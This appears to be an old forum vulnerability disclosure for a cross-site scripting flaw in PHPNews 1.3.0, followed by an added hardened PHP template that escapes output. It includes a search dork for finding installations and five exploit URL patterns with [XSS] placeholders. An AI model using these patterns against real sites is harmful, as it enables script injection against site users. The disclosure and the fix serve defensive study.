PHP News 1.3.0 14/12/2006 15:50:09 (+0700) | #1 | 30448
havythoai
PHP Script: PHPNews 1.3.0
Class: XSS
Website: http://newsphp.sourceforge.net
Found by: Detefix
dork: inurl:phpnews

-----

- Vulnerable Code:

<?php
// Template variables are interpolated into the HTML without any escaping.
print<<<EOT
<a href="$url?action=fullnews&showcomments=1&id=$id">$subject</a> by $username on $time<br />
EOT;

-----

- Exploits:

http://[target]/[path-to-PHPNews]/templates/link_temp.php?url=">[XSS]
http://[target]/[path-to-PHPNews]/templates/link_temp.php?id=">[XSS]
http://[target]/[path-to-PHPNews]/templates/link_temp.php?subject=[XSS]
http://[target]/[path-to-PHPNews]/templates/link_temp.php?username=[XSS]
http://[target]/[path-to-PHPNews]/templates/link_temp.php?time=[XSS]
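
-----

- Hardened template (added example, not part of the original post and not PHPNews code): the same link rendered with every value escaped for its HTML context and the href base restricted to an allowlist. The names e(), safe_href() and render_news_link() are hypothetical, and the sample inputs are constructed.

```php
<?php
// Added example: hardened equivalent of the link template quoted above.
// Function names are hypothetical; nothing here is taken from PHPNews itself.
declare(strict_types=1);

/** Escape a value for HTML element content or a double-quoted attribute. */
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Allow only an absolute http(s) URL or a plain relative path as the link base.
 * HTML escaping alone does not neutralise other URL schemes inside an href,
 * so anything outside the allowlist is replaced with a harmless fragment.
 */
function safe_href(string $url): string
{
    $ok = preg_match(
        '#\A(?:https?://[^\s"\'<>]+|(?!//)[A-Za-z0-9_./~-]+)\z#i',
        $url
    );
    return $ok === 1 ? $url : '#';
}

/** Build the "full news" link; $id is forced to an integer before use. */
function render_news_link(string $url, $id, string $subject, string $username, string $time): string
{
    $query = http_build_query([
        'action'       => 'fullnews',
        'showcomments' => 1,
        'id'           => (int) $id,
    ]);
    $href = safe_href($url) . '?' . $query;

    return sprintf(
        '<a href="%s">%s</a> by %s on %s<br />',
        e($href),
        e($subject),
        e($username),
        e($time)
    );
}

// Constructed sample values standing in for untrusted input.
echo render_news_link('index.php', '7"><b>', 'Release <1.3.0>', 'a"b', '14/12/2006'), "\n";
echo render_news_link('javascript:void(0)', 7, 'subject', 'user', 'time'), "\n";
```

Since every request in the list above targets templates/link_temp.php directly, the template file should also refuse to render unless it was included by the application.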